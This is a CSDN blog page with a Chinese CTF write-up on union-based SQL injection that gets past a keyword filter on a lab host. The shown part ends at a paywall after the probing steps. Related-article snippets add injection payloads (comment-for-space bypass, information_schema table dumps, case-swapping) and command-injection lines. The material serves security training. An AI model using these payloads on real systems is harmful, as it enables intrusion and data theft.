CTF---Web---SQL注入---03---联合注入+关键字过滤

最新推荐文章于 2022-05-09 14:53:53 发布
最新推荐文章于 2022-05-09 14:53:53 发布
阅读量875 收藏 3
点赞数
分类专栏: 刷题记录 CTF web 文章标签: CTF web SQL注入 刷题记录 hgzzk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_22160557/article/details/119203217
版权
本文介绍了CTF比赛中遇到的一道Web SQL注入题目,详细阐述了利用联合查询绕过关键字过滤的解题过程,包括判断注入方式、确定列数、寻找注入点以及获取数据库信息的步骤。
摘要由CSDN通过智能技术生成

文章目录

前言

题目分类:

CTF—Web—SQL注入—03—联合注入+关键字过滤

一、题目描述

题目:SQL注入

链接:http://192.168.87.175

二、解题步骤

1、回显判断注入方式

Step1: http://192.168.87.175/viewld.do?ldid=2,回显正常。有内容

Step2: http://192.168.87.175/viewld.do?ldid=2’,回显为空,无内容

Step3:http://192.168.87.175/viewld.do?ldid=2 and 1=1,回显为非法字符

Step4:http://192.168.87.175/viewld.do?ldid=2 And 1=1,回显正常。有内容
此时提示and被视为非法字符and被过滤。

Step5:http://192.168.87.175/viewld.do?ldid=2 And 1=2,回显为空,无内容

此时提示and后的内容被执行,可以尝试联合查询

注入方式为联合查询。

最低0.47元/天 解锁文章
ygxzq520
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[SWPUCTF 2021 新生赛]sql - 联合注入
oZuoShen123的博客
10-07 642
Your Login name:id,flag —— 这里复习了一下任意匹配字符,一开始都以为不用加%,差点忘记了。Your Login name:LTLT_flag,users —— 得到LTLT_flag。1、fuzz看哪些关键字过滤:空格、substr、=被过滤。这题相比于参考文章的题目多了waf过滤。首先,仍然是网站标题提示参数是wllm。
ctf-web
weixin_43150428的博客
11-04 2741
ctf-web 信息搜集 认证绕过 SQL注入 文件上传 文件包含 PHP代码审计 信息搜集 源码泄露 页面源代码 敏感文件泄漏 备份文件(.swp/.bak/.beifen/~/phps等) [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MGonEuLW-1604453612546)(https://i.loli.net/2020/11/02/kUboAxLhtRvD85z.png)] 数据库(mdb) 压缩包(zip/tar.gz//DS_Stor
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 949
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤
Onlyone_1314的博客
11-27 2038
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
CTF-Web3-(SQL简单过滤绕过)
→_→
07-24 1642
3.简单的sql注入 思路: 检测是否存在注入点的两种常用方法:(更多注入详情:Sqli-labs环境通关教程-学习) 1.基于报错的检测方法 一般这种方法是输入单引号’。看是否报错,如果数据库报错,说明后台数据库处理了我们输入的数据。那么有可能存在注 入点。 2.基于布尔的检测方法---(这只是最基础的判断) 这种方法是输入: 1 and 1=1 ,通常这种情况会正常返回数据 1 and 1=2 ,通常这种情况不会返回数据或者直接报错 或者 1' and '1'='1 ,通常这种.
CTFHUB-SQL注入-过滤空格
u014794539的博客
07-10 896
考点 正常的注入 过滤了空格 需要绕过 过程分析 首先正常注入会提醒HACKER 经过尝试发现可以使用/**/代替空格绕过 获取数据库信息 0/**/union/**/select/**/1,database()/**/ 获取表信息 0/**/union/**/select/**/1,group_concat(table_name)/**/ from/**/information_schema.tables/**/where/**/table_schema='sqli' 得到表名whjmqubsk
[CTF][SUCTF2019]easysql
凉水的博客
10-22 362
解题思路 1 先尝试可能的注入点 单引号 双引号 数字 字母等等,看界面反应。 最终结果: from union 等关键字过滤,flag字符串也被过滤。 可以使用堆叠注入。 输入字符串界面无反应,输入数字会返回,1,2,3等也会返回。 限制输入长度。 基本可以确定,是select … from xxx的句式。 但是会对最后一个字符做处理,如1,2,3,会返回1, 2,1 2 方向 把前面的规则理清了不太难,但是如何注入,很费脑筋。 因为from关键字被屏蔽,表名flag字符串也被屏蔽。同时又限制了输入长度
CTF-Web-SQL注入
beihai2013
01-26 3266
题目目录参考https://ca01h.top/Web_security/ctf_writeup/8.buuctf%E5%88%B7%E9%A2%98%E2%80%94%E2%80%94XSS/ 随便注 题目来源:强网杯2019 题目链接:https://buuoj.cn/challenges#[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8 考察:堆叠注入,sql的show语句,sql的预编译,sql修改表 参考:https:/
Bugku Web CTF-sql注入2
No Title
01-14 692
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
ctf sql注入关键词绕过【积累中】
qq_43679507的博客
11-13 1890
ctf sql注入关键词绕过【积累中】
联合注入小技巧
weixin_52387684的博客
11-01 1403
被一直小恐龙催更了!!! 啊啊啊,这是昨天的更!!! 呜呜呜,别催了!!!! PHP常见过滤函数 str_replace 对字符串进行替换 str_replace(find,replace,string,count) 参数 描述 find 必需。规定要查找的值 replace 必需。规定替换find中的值的值 string 必需。规定被搜索的字符串。 count 酷炫对替换数进行计数的变量 在PHP 5.0 的版本新增了count。在PHP4.3之前,该函数的fin
BUUCTF:[GYCTF2020]Ezsqli --过滤了information_schem ------ 无列明注入过滤了union 使用ascii偏移来做
Zero_Adam的博客
03-15 1445
一、自己做: 直截了当的sql注入,先用fuzz字典跑一下: information_schema.table等被过滤了, 而且union 也被过了, 尝试了 || 和&& 等没有过滤,并且strsub,limit等都没有过滤,初步判断盲注应该时可以的。 但是 information_chema等被过滤了,表和 列都查不出来, 二、学到的&&不足: 当information_schema等被过滤的时候,能够查出数据库的名字,但是表明不知道,这时可以用这个来sys.schem
XCTF-攻防世界CTF平台-Web类——7、NewsCenter(SQL注入
Onlyone_1314的博客
11-19 1802
目录标题手工注入information_schema.columns 学习sqlmap工具注入: 打开题目地址: 只有一个搜索框,下面是几条消息,上面输入关键词可以搜索这几条消息,可能就是存在SQL注入漏洞: 在后面加入’ or '1 = 1恒成立的判定条件: a ' or '1 = 1 搜索结果变成了所有的消息,应该就是存在SQL注入 手工注入 之后我们在后面拼接order by,来查看表中有多少列,查询结果按照前1列排序(第一个’闭合后台命令的第一个’,#注释掉后台的第二个’): ' order
CTF-SQL过滤字符后手工注入漏洞测试(第1题)
asd158923328的博客
08-21 1000
根据题意 SQL注入原理:SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 进入环境,加’ 和 -1 1+0页面发生变化,返回页面不存在,或者显错,存在注入点 进一步发现,空格和‘=’也被过滤掉了 所以‘=’可以用Like 替...
ctf-WEB-都过滤
god_001的博客
05-09 1047
题目地址:跳转提示 打开网址,看到一个登陆页面: 首先随便输入用户名和密码,发现只报错显示用户名错误,因此推出后端先判断用户名,可能使用sql语句:SELECT * FROM tab_name WHERE uname=... 发现'#','-- ',' ','or','and','/*'都被过滤了 尝试判断闭合,发现用户名无论是admin'还是admin",都没有其他报错,先预设是单引号闭合 输入用户名为a'-'0,密码123 发现结果显示密码错误 可推出,确实是单引号闭合 原.
CTF学习笔记10:iwebsec-SQL注入漏洞-08-大小写过滤绕过
lvx++的博客
01-23 928
一、解题过程 将SQL关键都换成大小写交替,最后经查看源码,本题只过滤了select ?id=-1 Union Select 1,2,Group_concat(concat(username,0x7e,password)) From iwebsec.users
CTFHub技能树笔记之RCE:过滤目录分隔符、过滤运算符、综合过滤练习
weixin_48799157的博客
03-29 2607
小白一个,记录解题过程,如有错误请指正! 一、过滤目录分隔符 1.查看当前目录 2.有提示,进去看一下 127.0.0.1;ls flag_is_here 3.根据经验知道我们只要访问到php文件的内容就可以拿到flag了 思路:这里我们可以用&&运算符将命令连接起来就能成功拿到flag 127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64 二、过...
CTFHub技能树笔记之RCE:命令注入过滤cat、过滤空格
weixin_48799157的博客
03-28 8691
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值